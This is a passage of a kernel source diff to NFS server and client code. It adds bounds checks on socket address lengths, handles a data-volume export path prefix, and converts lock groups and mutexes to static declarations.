< unxa->nxa_netcount; net++, uaddr += sizeof(nxna)) { error = copyin(uaddr, &nxna, sizeof(nxna)); if (error) { @@ -2769,7 +2770,9 @@ nfsrv_hang_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) } if (nxna.nxna_addr.ss_len > sizeof(struct sockaddr_storage) || + (nxna.nxna_addr.ss_len != 0 && nxna.nxna_addr.ss_len < ss_minsize) || nxna.nxna_mask.ss_len > sizeof(struct sockaddr_storage) || + (nxna.nxna_mask.ss_len != 0 && nxna.nxna_mask.ss_len < ss_minsize) || nxna.nxna_addr.ss_family > AF_MAX || nxna.nxna_mask.ss_family > AF_MAX) { return EINVAL; @@ -2956,6 +2959,7 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) struct radix_node *rn; struct nfsrv_free_netopt_arg fna; struct nfs_netopt *nno; + size_t ss_minsize; user_addr_t uaddr; unsigned int net; int i, error; @@ -2976,6 +2980,7 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) /* delete only the exports specified */ uaddr = unxa->nxa_nets; + ss_minsize = sizeof(((struct sockaddr_storage *)0)->ss_len) + sizeof(((struct sockaddr_storage *)0)->ss_family); for (net = 0; net < unxa->nxa_netcount; net++, uaddr += sizeof(nxna)) { error = copyin(uaddr, &nxna, sizeof(nxna)); if (error) { @@ -2994,6 +2999,20 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) continue; } + if (nxna.nxna_addr.ss_len > sizeof(struct sockaddr_storage) || + (nxna.nxna_addr.ss_len != 0 && nxna.nxna_addr.ss_len < ss_minsize) || + nxna.nxna_addr.ss_family > AF_MAX) { + printf("nfsrv_free_addrlist: invalid socket address (%u)\n", net); + continue; + } + + if (nxna.nxna_mask.ss_len > sizeof(struct sockaddr_storage) || + (nxna.nxna_mask.ss_len != 0 && nxna.nxna_mask.ss_len < ss_minsize) || + nxna.nxna_mask.ss_family > AF_MAX) { + printf("nfsrv_free_addrlist: invalid socket mask (%u)\n", net); + continue; + } + if ((rnh = nx->nx_rtable[nxna.nxna_addr.ss_family]) == 0) { /* AF not initialized? */ if (!(unxa->nxa_flags & NXA_ADD)) { @@ -3031,21 +3050,24 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) void enablequotas(struct mount *mp, vfs_context_t ctx); // XXX +#define DATA_VOLUME_MP "/System/Volumes/Data" // PLATFORM_DATA_VOLUME_MOUNT_POINT + int nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx) { int error = 0; - size_t pathlen; + size_t pathlen, nxfs_pathlen; struct nfs_exportfs *nxfs, *nxfs2, *nxfs3; struct nfs_export *nx, *nx2, *nx3; struct nfs_filehandle nfh; struct nameidata mnd, xnd; vnode_t mvp = NULL, xvp = NULL; mount_t mp = NULL; - char path[MAXPATHLEN]; + char path[MAXPATHLEN], *nxfs_path; char fl_pathbuff[MAXPATHLEN]; int fl_pathbuff_len = MAXPATHLEN; int expisroot; + size_t datavol_len = strlen(DATA_VOLUME_MP); if (unxa->nxa_flags == NXA_CHECK) { /* just check if the path is an NFS-exportable file system */ @@ -3147,7 +3169,8 @@ nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx) } if (nxfs) { /* verify exported FS path matches given path */ - if (strncmp(path, nxfs->nxfs_path, MAXPATHLEN)) { + if (strncmp(path, nxfs->nxfs_path, MAXPATHLEN) && + (strncmp(path, DATA_VOLUME_MP, datavol_len) || strncmp(path + datavol_len, nxfs->nxfs_path, MAXPATHLEN - datavol_len))) { error = EEXIST; goto unlock_out; } @@ -3239,13 +3262,20 @@ nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx) } bzero(nxfs, sizeof(struct nfs_exportfs)); nxfs->nxfs_id = unxa->nxa_fsid; - MALLOC(nxfs->nxfs_path, char*, pathlen, M_TEMP, M_WAITOK); + if (mp) { + nxfs_path = mp->mnt_vfsstat.f_mntonname; + nxfs_pathlen = sizeof(mp->mnt_vfsstat.f_mntonname); + } else { + nxfs_path = path; + nxfs_pathlen = pathlen; + } + MALLOC(nxfs->nxfs_path, char*, nxfs_pathlen, M_TEMP, M_WAITOK); if (!nxfs->nxfs_path) { FREE(nxfs, M_TEMP); error = ENOMEM; goto out; } - bcopy(path, nxfs->nxfs_path, pathlen); + bcopy(nxfs_path, nxfs->nxfs_path, nxfs_pathlen); /* insert into list in reverse-sorted order */ nxfs3 = NULL; LIST_FOREACH(nxfs2, &nfsrv_exports, nxfs_next) { @@ -4052,7 +4082,7 @@ nfsrv_init_user_list(struct nfs_active_user_list *ulist) } ulist->node_count = 0; - lck_mtx_init(&ulist->user_mutex, nfsrv_active_user_mutex_group, LCK_ATTR_NULL); + lck_mtx_init(&ulist->user_mutex, &nfsrv_active_user_mutex_group, LCK_ATTR_NULL); } /* Free all nodes in an active user list */ @@ -4076,7 +4106,7 @@ nfsrv_free_user_list(struct nfs_active_user_list *ulist) } ulist->node_count = 0; - lck_mtx_destroy(&ulist->user_mutex, nfsrv_active_user_mutex_group); + lck_mtx_destroy(&ulist->user_mutex, &nfsrv_active_user_mutex_group); } /* Reclaim old expired user nodes from active user lists. */ diff --git a/bsd/nfs/nfs_syscalls.c b/bsd/nfs/nfs_syscalls.c index 90cba6ed4..511bc3c6b 100644 --- a/bsd/nfs/nfs_syscalls.c +++ b/bsd/nfs/nfs_syscalls.c @@ -358,7 +358,7 @@ void nfsiod_terminate(struct nfsiod *niod) { nfsiod_thread_count--; - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); if (niod) { FREE(niod, M_TEMP); } else { @@ -377,21 +377,21 @@ nfsiod_thread(void) MALLOC(niod, struct nfsiod *, sizeof(struct nfsiod), M_TEMP, M_WAITOK); if (!niod) { - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); nfsiod_thread_count--; wakeup(current_thread()); - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); thread_terminate(current_thread()); /*NOTREACHED*/ } bzero(niod, sizeof(*niod)); - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); TAILQ_INSERT_HEAD(&nfsiodfree, niod, niod_link); wakeup(current_thread()); - error = msleep0(niod, nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue); + error = msleep0(niod, &nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue); /* shouldn't return... so we have an error */ /* remove an old nfsiod struct and terminate */ - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); if ((niod = TAILQ_LAST(&nfsiodfree, nfsiodlist))) { TAILQ_REMOVE(&nfsiodfree, niod, niod_link); } @@ -408,18 +408,18 @@ nfsiod_start(void) { thread_t thd = THREAD_NULL; - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); if ((nfsiod_thread_count >= NFSIOD_MAX) && (nfsiod_thread_count > 0)) { - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); return EBUSY; } nfsiod_thread_count++; if (kernel_thread_start((thread_continue_t)nfsiod_thread, NULL, &thd) != KERN_SUCCESS) { - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); return EBUSY; } /* wait for the thread to complete startup */ - msleep(thd, nfsiod_mutex, PWAIT | PDROP, "nfsiodw", NULL); + msleep(thd, &nfsiod_mutex, PWAIT | PDROP, "nfsiodw", NULL); thread_deallocate(thd); return 0; } @@ -438,7 +438,7 @@ nfsiod_continue(int error) struct nfs_reqqhead iodq; int morework; - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); niod = TAILQ_FIRST(&nfsiodwork); if (!niod) { /* there's no work queued up */ @@ -478,7 +478,7 @@ worktodo: req->r_flags |= R_IOD; lck_mtx_unlock(&req->r_mtx); } - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); /* process the queue */ TAILQ_FOREACH_SAFE(req, &iodq, r_achain, treq) { @@ -488,7 +488,7 @@ worktodo: } /* now check if there's more/other work to be done */ - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); morework = !TAILQ_EMPTY(&nmp->nm_iodq); if (!morework || !TAILQ_EMPTY(&nfsiodmounts)) { /* @@ -516,10 +516,10 @@ worktodo: /* queue ourselves back up - if there aren't too many threads running */ if (nfsiod_thread_count <= NFSIOD_MAX) { TAILQ_INSERT_HEAD(&nfsiodfree, niod, niod_link); - error = msleep0(niod, nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue); + error = msleep0(niod, &nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue); /* shouldn't return... so we have an error */ /* remove an old nfsiod struct and terminate */ - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); if ((niod = TAILQ_LAST(&nfsiodfree, nfsiodlist))) { TAILQ_REMOVE(&nfsiodfree, niod, niod_link); } @@ -1028,16 +1028,16 @@ nfssvc_addsock(socket_t so, mbuf_t mynam) return ENOMEM; } bzero((caddr_t)slp, sizeof(struct nfsrv_sock)); - lck_rw_init(&slp->ns_rwlock, nfsrv_slp_rwlock_group, LCK_ATTR_NULL); - lck_mtx_init(&slp->ns_wgmutex, nfsrv_slp_mutex_group, LCK_ATTR_NULL); + lck_rw_init(&slp->ns_rwlock, &nfsrv_slp_rwlock_group, LCK_ATTR_NULL); + lck_mtx_init(&slp->ns_wgmutex, &nfsrv_slp_mutex_group, LCK_ATTR_NULL); - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); if (soprotocol == IPPROTO_UDP) { if (sodomain == AF_INET) { /* There should be only one UDP/IPv4 socket */ if (nfsrv_udpsock) { - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); nfsrv_slpfree(slp); mbuf_freem(mynam); return EEXIST; @@ -1047,7 +1047,7 @@ nfssvc_addsock(socket_t so, mbuf_t mynam) if (sodomain == AF_INET6) { /* There should be only one UDP/IPv6 socket */ if (nfsrv_udp6sock) { - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); nfsrv_slpfree(slp); mbuf_freem(mynam); return EEXIST; @@ -1130,7 +1130,7 @@ nfssvc_addsock(socket_t so, mbuf_t mynam) slp->ns_flag = SLP_VALID | SLP_NEEDQ; nfsrv_wakenfsd(slp); - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); return 0; } @@ -1194,12 +1194,12 @@ nfssvc_nfsd(void) return ENOMEM; } bzero(nfsd, sizeof(struct nfsd)); - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); if (nfsd_thread_count++ == 0) { nfsrv_initcache(); /* Init the server request cache */ } TAILQ_INSERT_TAIL(&nfsd_head, nfsd, nfsd_chain); - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); context.vc_thread = current_thread(); @@ -1222,7 +1222,7 @@ nfssvc_nfsd(void) } else { /* need to find work to do */ error = 0; - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); while (!nfsd->nfsd_slp && TAILQ_EMPTY(&nfsrv_sockwait) && TAILQ_EMPTY(&nfsrv_sockwork)) { if (nfsd_thread_count > nfsd_thread_max) { /* @@ -1234,7 +1234,7 @@ nfssvc_nfsd(void) } nfsd->nfsd_flag |= NFSD_WAITING; TAILQ_INSERT_HEAD(&nfsd_queue, nfsd, nfsd_queue); - error = msleep(nfsd, nfsd_mutex, PSOCK | PCATCH, "nfsd", &to); + error = msleep(nfsd, &nfsd_mutex, PSOCK | PCATCH, "nfsd", &to); if (error) { if (nfsd->nfsd_flag & NFSD_WAITING) { TAILQ_REMOVE(&nfsd_queue, nfsd, nfsd_queue); @@ -1290,7 +1290,7 @@ nfssvc_nfsd(void) slp->ns_flag |= SLP_WORKQ; lck_rw_done(&slp->ns_rwlock); } - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); if (!slp) { continue; } @@ -1495,7 +1495,7 @@ nfssvc_nfsd(void) } NFS_ZFREE(nfsrv_descript_zone, nd); nfsrv_slpderef(slp); - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); goto done; } break; @@ -1553,14 +1553,14 @@ nfssvc_nfsd(void) nfsrv_slpderef(slp); } } - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); done: TAILQ_REMOVE(&nfsd_head, nfsd, nfsd_chain); FREE(nfsd, M_NFSD); if (--nfsd_thread_count == 0) { nfsrv_cleanup(); } - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); return error; } @@ -1677,8 +1677,8 @@ nfsrv_slpfree(struct nfsrv_sock *slp) } LIST_INIT(&slp->ns_tq); - lck_rw_destroy(&slp->ns_rwlock, nfsrv_slp_rwlock_group); - lck_mtx_destroy(&slp->ns_wgmutex, nfsrv_slp_mutex_group); + lck_rw_destroy(&slp->ns_rwlock, &nfsrv_slp_rwlock_group); + lck_mtx_destroy(&slp->ns_wgmutex, &nfsrv_slp_mutex_group); FREE(slp, M_NFSSVC); } @@ -1734,9 +1734,9 @@ nfsrv_slpderef_locked(struct nfsrv_sock *slp) void nfsrv_slpderef(struct nfsrv_sock *slp) { - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); nfsrv_slpderef_locked(slp); - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); } /* @@ -1751,7 +1751,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1) time_t time_to_wait = nfsrv_sock_idle_timeout; microuptime(&now); - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); /* Turn off the timer if we're suppose to and get out */ if (nfsrv_sock_idle_timeout < NFSD_MIN_IDLE_TIMEOUT) { @@ -1759,7 +1759,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1) } if ((nfsrv_sock_tcp_cnt <= 2 * nfsd_thread_max) || (nfsrv_sock_idle_timeout == 0)) { nfsrv_idlesock_timer_on = 0; - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); return; } @@ -1800,7 +1800,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1) nfs_interval_timer_start(nfsrv_idlesock_timer_call, time_to_wait * 1000); /* Remember when the next timer will fire for nfssvc_addsock. */ nfsrv_idlesock_timer_on = now.tv_sec + time_to_wait; - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); } /* @@ -1832,7 +1832,7 @@ nfsrv_cleanup(void) /* * Flush pending file write fsevents */ - lck_mtx_lock(nfsrv_fmod_mutex); + lck_mtx_lock(&nfsrv_fmod_mutex); for (i = 0; i < NFSRVFMODHASHSZ; i++) { for (fp = LIST_FIRST(&nfsrv_fmod_hashtbl[i]); fp; fp = nfp) { /* @@ -1853,7 +1853,7 @@ nfsrv_cleanup(void) } } nfsrv_fmod_pending = 0; - lck_mtx_unlock(nfsrv_fmod_mutex); + lck_mtx_unlock(&nfsrv_fmod_mutex); #endif nfsrv_uc_cleanup(); /* Stop nfs socket up-call threads */ diff --git a/bsd/nfs/nfs_upcall.c b/bsd/nfs/nfs_upcall.c index b719f88a0..4acf8cf13 100644 --- a/bsd/nfs/nfs_upcall.c +++ b/bsd/nfs/nfs_upcall.c @@ -66,15 +66,15 @@ struct nfsrv_uc_arg { TAILQ_HEAD(nfsrv_uc_q, nfsrv_uc_arg); static struct nfsrv_uc_queue { - lck_mtx_t *ucq_lock; + lck_mtx_t ucq_lock; struct nfsrv_uc_q ucq_queue[1]; thread_t ucq_thd; uint32_t ucq_flags; } nfsrv_uc_queue_tbl[NFS_UC_HASH_SZ]; #define NFS_UC_QUEUE_SLEEPING 0x0001 -static lck_grp_t *nfsrv_uc_group; -static lck_mtx_t *nfsrv_uc_shutdown_lock; +static LCK_GRP_DECLARE(nfsrv_uc_group, "nfs_upcall_locks"); +static LCK_MTX_DECLARE(nfsrv_uc_shutdown_lock, &nfsrv_uc_group); static volatile int nfsrv_uc_shutdown = 0; static int32_t nfsrv_uc_thread_count; @@ -100,18 +100,18 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused) DPRINT("nfsrv_uc_thread %d started\n", qi); while (!nfsrv_uc_shutdown) { - lck_mtx_lock(myqueue->ucq_lock); + lck_mtx_lock(&myqueue->ucq_lock); while (!nfsrv_uc_shutdown && TAILQ_EMPTY(myqueue->ucq_queue)) { myqueue->ucq_flags |= NFS_UC_QUEUE_SLEEPING; - error = msleep(myqueue, myqueue->ucq_lock, PSOCK, "nfsd_upcall_handler", NULL); + error = msleep(myqueue, &myqueue->ucq_lock, PSOCK, "nfsd_upcall_handler", NULL); myqueue->ucq_flags &= ~NFS_UC_QUEUE_SLEEPING; if (error) { printf("nfsrv_uc_thread received error %d\n", error); } } if (nfsrv_uc_shutdown) { - lck_mtx_unlock(myqueue->ucq_lock); + lck_mtx_unlock(&myqueue->ucq_lock); break; } @@ -123,7 +123,7 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused) ep->nua_flags &= ~NFS_UC_QUEUED; - lck_mtx_unlock(myqueue->ucq_lock); + lck_mtx_unlock(&myqueue->ucq_lock); #ifdef NFS_UC_Q_DEBUG OSDecrementAtomic(&nfsrv_uc_queue_count); @@ -133,10 +133,10 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused) nfsrv_rcv(ep->nua_so, (void *)ep->nua_slp, ep->nua_waitflag); } - lck_mtx_lock(nfsrv_uc_shutdown_lock); + lck_mtx_lock(&nfsrv_uc_shutdown_lock); nfsrv_uc_thread_count--; wakeup(&nfsrv_uc_thread_count); - lck_mtx_unlock(nfsrv_uc_shutdown_lock); + lck_mtx_unlock(&nfsrv_uc_shutdown_lock); thread_terminate(current_thread()); } @@ -160,7 +160,7 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp) return; } /* If we're queued we might race with nfsrv_uc_thread */ - lck_mtx_lock(myqueue->ucq_lock); + lck_mtx_lock(&myqueue->ucq_lock); if (ap->nua_flags & NFS_UC_QUEUED) { printf("nfsrv_uc_dequeue remove %p\n", ap); TAILQ_REMOVE(myqueue->ucq_queue, ap, nua_svcq); @@ -171,7 +171,7 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp) } FREE(slp->ns_ua, M_TEMP); slp->ns_ua = NULL; - lck_mtx_unlock(myqueue->ucq_lock); + lck_mtx_unlock(&myqueue->ucq_lock); } /* @@ -180,16 +180,12 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp) void nfsrv_uc_init(void) { - int i; - - nfsrv_uc_group = lck_grp_alloc_init("nfs_upcall_locks", LCK_GRP_ATTR_NULL); - for (i = 0; i < NFS_UC_HASH_SZ; i++) { + for (int i = 0; i < NFS_UC_HASH_SZ; i++) { TAILQ_INIT(nfsrv_uc_queue_tbl[i].ucq_queue); - nfsrv_uc_queue_tbl[i].ucq_lock = lck_mtx_alloc_init(nfsrv_uc_group, LCK_ATTR_NULL); + lck_mtx_init(&nfsrv_uc_queue_tbl[i].ucq_lock, &nfsrv_uc_group, LCK_ATTR_NULL); nfsrv_uc_queue_tbl[i].ucq_thd = THREAD_NULL; nfsrv_uc_queue_tbl[i].ucq_flags = 0; } - nfsrv_uc_shutdown_lock = lck_mtx_alloc_init(nfsrv_uc_group, LCK_ATTR_NULL); } /* @@ -210,9 +206,9 @@ nfsrv_uc_start(void) DPRINT("nfsrv_uc_start\n"); /* Wait until previous shutdown finishes */ - lck_mtx_lock(nfsrv_uc_shutdown_lock); + lck_mtx_lock(&nfsrv_uc_shutdown_lock); while (nfsrv_uc_shutdown || nfsrv_uc_thread_count > 0) { - msleep(&nfsrv_uc_thread_count, nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_wait", NULL); + msleep(&nfsrv_uc_thread_count, &nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_wait", NULL); } /* Start up-call threads */ @@ -234,7 +230,7 @@ out: nfsrv_uc_queue_count = 0ULL; nfsrv_uc_queue_max_seen = 0ULL; #endif - lck_mtx_unlock(nfsrv_uc_shutdown_lock); + lck_mtx_unlock(&nfsrv_uc_shutdown_lock); } /* @@ -252,15 +248,15 @@ nfsrv_uc_stop(void) /* Signal up-call threads to stop */ nfsrv_uc_shutdown = 1; for (i = 0; i < thread_count; i++) { - lck_mtx_lock(nfsrv_uc_queue_tbl[i].ucq_lock); + lck_mtx_lock(&nfsrv_uc_queue_tbl[i].ucq_lock); wakeup(&nfsrv_uc_queue_tbl[i]); - lck_mtx_unlock(nfsrv_uc_queue_tbl[i].ucq_lock); + lck_mtx_unlock(&nfsrv_uc_queue_tbl[i].ucq_lock); } /* Wait until they are done shutting down */ - lck_mtx_lock(nfsrv_uc_shutdown_lock); + lck_mtx_lock(&nfsrv_uc_shutdown_lock); while (nfsrv_uc_thread_count > 0) { - msleep(&nfsrv_uc_thread_count, nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_stop", NULL); + msleep(&nfsrv_uc_thread_count, &nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_stop", NULL); } /* Deallocate old threads */ @@ -273,7 +269,7 @@ nfsrv_uc_stop(void) /* Enable restarting */ nfsrv_uc_shutdown = 0; - lck_mtx_unlock(nfsrv_uc_shutdown_lock); + lck_mtx_unlock(&nfsrv_uc_shutdown_lock); } /* @@ -296,13 +292,13 @@ nfsrv_uc_cleanup(void) for (i = 0; i < NFS_UC_HASH_SZ; i++) { struct nfsrv_uc_queue *queue = &nfsrv_uc_queue_tbl[i]; - lck_mtx_lock(queue->ucq_lock); + lck_mtx_lock(&queue->ucq_lock); while (!TAILQ_EMPTY(queue->ucq_queue)) { struct nfsrv_uc_arg *ep = TAILQ_FIRST(queue->ucq_queue); TAILQ_REMOVE(queue->ucq_queue, ep, nua_svcq); ep->nua_flags &= ~NFS_UC_QUEUED; } - lck_mtx_unlock(queue->ucq_lock); + lck_mtx_unlock(&queue->ucq_lock); } nfsrv_uc_stop(); @@ -323,11 +319,11 @@ nfsrv_uc_proxy(socket_t so, void *arg, int waitflag) int qi = uap->nua_qi; struct nfsrv_uc_queue *myqueue = &nfsrv_uc_queue_tbl[qi]; - lck_mtx_lock(myqueue->ucq_lock); + lck_mtx_lock(&myqueue->ucq_lock); DPRINT("nfsrv_uc_proxy called for %p (%p)\n", uap, uap->nua_slp); DPRINT("\tUp-call queued on %d for wakeup of %p\n", qi, myqueue); if (uap == NULL || uap->nua_flags & NFS_UC_QUEUED) { - lck_mtx_unlock(myqueue->ucq_lock); + lck_mtx_unlock(&myqueue->ucq_lock); return; /* Already queued or freed */ } @@ -355,7 +351,7 @@ nfsrv_uc_proxy(socket_t so, void *arg, int waitflag) } } #endif - lck_mtx_unlock(myqueue->ucq_lock); + lck_mtx_unlock(&myqueue->ucq_lock); } diff --git a/bsd/nfs/nfs_vfsops.c b/bsd/nfs/nfs_vfsops.c index 82e3c594c..482f8f758 100644 --- a/bsd/nfs/nfs_vfsops.c +++ b/bsd/nfs/nfs_vfsops.c @@ -134,8 +134,9 @@ ZONE_DECLARE(nfsmnt_zone, "NFS mount", sizeof(struct nfsmount), ZC_ZFREE_CLEARMEM); int nfs_ticks; -static lck_grp_t *nfs_global_grp, *nfs_mount_grp; -lck_mtx_t *nfs_global_mutex; +static LCK_GRP_DECLARE(nfs_global_grp, "nfs_global"); +static LCK_GRP_DECLARE(nfs_mount_grp, "nfs_mount"); +LCK_MTX_DECLARE(nfs_global_mutex, &nfs_global_grp); uint32_t nfs_fs_attr_bitmap[NFS_ATTR_BITMAP_LEN]; uint32_t nfs_object_attr_bitmap[NFS_ATTR_BITMAP_LEN]; uint32_t nfs_getattr_bitmap[NFS_ATTR_BITMAP_LEN]; @@ -144,8 +145,8 @@ struct nfsclientidlist nfsclientids; /* NFS requests */ struct nfs_reqqhead nfs_reqq; -lck_grp_t *nfs_request_grp; -lck_mtx_t *nfs_request_mutex; +LCK_GRP_DECLARE(nfs_request_grp, "nfs_request"); +LCK_MTX_DECLARE(nfs_request_mutex, &nfs_request_grp); thread_call_t nfs_request_timer_call; int nfs_request_timer_on; u_int64_t nfs_xid = 0; @@ -154,7 +155,7 @@ u_int64_t nfs_xidwrap = 0; /* to build a (non-wrapping) 64 bit xid thread_call_t nfs_buf_timer_call; /* NFSv4 */ -lck_grp_t *nfs_open_grp; +LCK_GRP_DECLARE(nfs_open_grp, "nfs_open"); uint32_t nfs_open_owner_seqnum = 0; uint32_t nfs_lock_owner_seqnum = 0; thread_call_t nfs4_callback_timer_call; @@ -162,8 +163,8 @@ int nfs4_callback_timer_on = 0; char nfs4_default_domain[MAXPATHLEN]; /* nfsiod */ -lck_grp_t *nfsiod_lck_grp; -lck_mtx_t *nfsiod_mutex; +static LCK_GRP_DECLARE(nfsiod_lck_grp, "nfsiod"); +LCK_MTX_DECLARE(nfsiod_mutex, &nfsiod_lck_grp); struct nfsiodlist nfsiodfree, nfsiodwork; struct nfsiodmountlist nfsiodmounts; int nfsiod_thread_count = 0; @@ -322,26 +323,11 @@ nfs_vfs_init(__unused struct vfsconf *vfsp) TAILQ_INIT(&nfsiodfree); TAILQ_INIT(&nfsiodwork); TAILQ_INIT(&nfsiodmounts); - nfsiod_lck_grp = lck_grp_alloc_init("nfsiod", LCK_GRP_ATTR_NULL); - nfsiod_mutex = lck_mtx_alloc_init(nfsiod_lck_grp, LCK_ATTR_NULL); - - /* init lock groups, etc. */ - nfs_mount_grp = lck_grp_alloc_init("nfs_mount", LCK_GRP_ATTR_NULL); - nfs_open_grp = lck_grp_alloc_init("nfs_open", LCK_GRP_ATTR_NULL); - nfs_global_grp = lck_grp_alloc_init("nfs_global", LCK_GRP_ATTR_NULL); - - nfs_global_mutex = lck_mtx_alloc_init(nfs_global_grp, LCK_ATTR_NULL); - - /* init request list mutex */ - nfs_request_grp = lck_grp_alloc_init("nfs_request", LCK_GRP_ATTR_NULL); - nfs_request_mutex = lck_mtx_alloc_init(nfs_request_grp, LCK_ATTR_NULL); /* initialize NFS request list */ TAILQ_INIT(&nfs_reqq); nfs_nbinit(); /* Init the nfsbuf table */ - nfs_nhinit(); /* Init the nfsnode table */ - nfs_lockinit(); /* Init the nfs lock state */ #if CONFIG_NFS_GSS nfs_gss_init(); /* Init RPCSEC_GSS security */ #endif @@ -1777,12 +1763,22 @@ nfs_convert_old_nfs_args(mount_t mp, user_addr_t data, vfs_context_t ctx, int ar /* convert address to universal address string */ if (ss.ss_family == AF_INET) { - sinaddr = &((struct sockaddr_in*)&ss)->sin_addr; + if (ss.ss_len != sizeof(struct sockaddr_in)) { + error = EINVAL; + } else { + sinaddr = &((struct sockaddr_in*)&ss)->sin_addr; + } } else if (ss.ss_family == AF_INET6) { - sinaddr = &((struct sockaddr_in6*)&ss)->sin6_addr; + if (ss.ss_len != sizeof(struct sockaddr_in6)) { + error = EINVAL; + } else { + sinaddr = &((struct sockaddr_in6*)&ss)->sin6_addr; + } } else { sinaddr = NULL; } + nfsmout_if(error); + if (!sinaddr || (inet_ntop(ss.ss_family, sinaddr, uaddr, sizeof(uaddr)) != uaddr)) { error = EINVAL; goto nfsmout; @@ -2377,6 +2373,7 @@ nfs4_mount( *npp = NULL; fh.fh_len = dirfh.fh_len = 0; + lck_mtx_init(&nmp->nm_timer_lock, &nfs_mount_grp, LCK_ATTR_NULL); TAILQ_INIT(&nmp->nm_open_owners); TAILQ_INIT(&nmp->nm_delegations); TAILQ_INIT(&nmp->nm_dreturnq); @@ -2776,7 +2773,7 @@ gotfh: } /* set up lease renew timer */ - nmp->nm_renew_timer = thread_call_allocate(nfs4_renew_timer, nmp); + nmp->nm_renew_timer = thread_call_allocate_with_options(nfs4_renew_timer, nmp, THREAD_CALL_PRIORITY_HIGH, THREAD_CALL_OPTIONS_ONCE); interval = nmp->nm_fsattr.nfsa_lease / 2; if (interval < 1) { interval = 1; @@ -2990,7 +2987,7 @@ mountnfs( } else { /* allocate an NFS mount structure for this mount */ nmp = zalloc_flags(nfsmnt_zone, Z_WAITOK | Z_ZERO); - lck_mtx_init(&nmp->nm_lock, nfs_mount_grp, LCK_ATTR_NULL); + lck_mtx_init(&nmp->nm_lock, &nfs_mount_grp, LCK_ATTR_NULL); TAILQ_INIT(&nmp->nm_resendq); TAILQ_INIT(&nmp->nm_iodq); TAILQ_INIT(&nmp->nm_gsscl); @@ -4583,7 +4580,7 @@ nfs_ephemeral_mount_harvester(__unused void *arg, __unused wait_result_t wr) vfs_unmountbyfsid(&hinfo.fsid, 0, vfs_context_kernel()); } - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (!hinfo.mountcount) { /* no more ephemeral mounts - don't need timer */ nfs_ephemeral_mount_harvester_on = 0; @@ -4593,7 +4590,7 @@ nfs_ephemeral_mount_harvester(__unused void *arg, __unused wait_result_t wr) thread_call_enter_delayed(nfs_ephemeral_mount_harvester_timer, deadline); nfs_ephemeral_mount_harvester_on = 1; } - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); /* thread done */ thread_terminate(current_thread()); @@ -4607,9 +4604,9 @@ nfs_ephemeral_mount_harvester_start(void) { uint64_t deadline; - 